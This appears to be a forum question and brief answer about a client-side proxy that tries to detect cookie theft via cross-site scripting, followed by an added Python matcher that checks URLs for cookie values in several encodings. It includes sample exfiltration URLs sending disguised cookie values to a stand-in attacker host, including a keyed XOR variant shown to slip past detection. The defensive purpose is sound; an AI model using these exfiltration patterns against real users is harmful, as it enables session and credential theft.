Cross-site scripting - Cookie encryption
I am developing a client-side proxy to counter Cross-site scripting attacks. All the requests from the browser will go through the proxy. I am able to classify the requests as local or cross-domain, using the Referer header and other things. But, I need to reduce the number of false positives.
For this, I will track the cookie sent from the web-server in a response and I will look for parts of this cookie in any cross-domain request, i.e., I will check for only the cross-site requests that carry sensitive information (cookie).
But this simple idea simply fails if the attacker constructs an HTTP response where the cookie is encrypted and leaked.
For example,
cookie :
user=rahim;pass=asdf
The hacker constructs a request
www.evil.com?name=mihar&pass=fdsa
The attacker has simply reversed the cookie parameters. There are innumerable ways the attacker can play with the cookie and fool the process.
I need an algorithm which checks just that. The cookie parameters should not be allowed to pass through in whatever form.
Your task is hopeless. There is no way to tell what the true meaning of a cookie is.
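The check described in the question, as an added example that is not part of the original post or answer: a proxy-side matcher that looks for each cookie value in a cross-domain URL in plain form and in a few keyless re-encodings, going beyond the single reversal case shown above. The function names, the `MIN_LEN` threshold and the sample URLs are assumptions made for illustration; the last sample shows a keyed transform passing unnoticed, which is the limit the answer points to.

```python
import base64
from urllib.parse import urlsplit, parse_qsl

MIN_LEN = 4  # assumed threshold: shorter values match by accident too often


def cookie_values(cookie_header):
    """Split 'user=rahim;pass=asdf' into the values worth tracking."""
    values = []
    for part in cookie_header.split(";"):
        _, _, value = part.strip().partition("=")
        if len(value) >= MIN_LEN:
            values.append(value)
    return values


def variants(value):
    """Keyless re-encodings of one cookie value that the proxy searches for."""
    raw = value.encode()
    return {
        "plain": value,
        "reversed": value[::-1],
        "hex": raw.hex(),
        "base64": base64.b64encode(raw).decode().rstrip("="),
    }


def leaked(cookie_header, url):
    """Return (cookie value, encoding) pairs found in the URL's query string."""
    # parse_qsl percent-decodes, so URL-encoded copies are matched as plain.
    query = [v for _, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    hits = []
    for value in cookie_values(cookie_header):
        for name, form in variants(value).items():
            if any(form in q for q in query):
                hits.append((value, name))
    return hits


if __name__ == "__main__":
    cookie = "user=rahim;pass=asdf"  # cookie from the question
    print(leaked(cookie, "www.evil.com?name=mihar&pass=fdsa"))  # question's URL
    # Constructed sample: value XORed with a one-byte key, then hex-encoded.
    keyed = bytes(b ^ 0x2A for b in b"rahim").hex()
    print(leaked(cookie, "http://www.evil.com/?d=" + keyed))  # no match
```

Every entry added to `variants` widens what is caught and also what is falsely flagged, while any transform that depends on a key the proxy does not know stays invisible to this kind of matching.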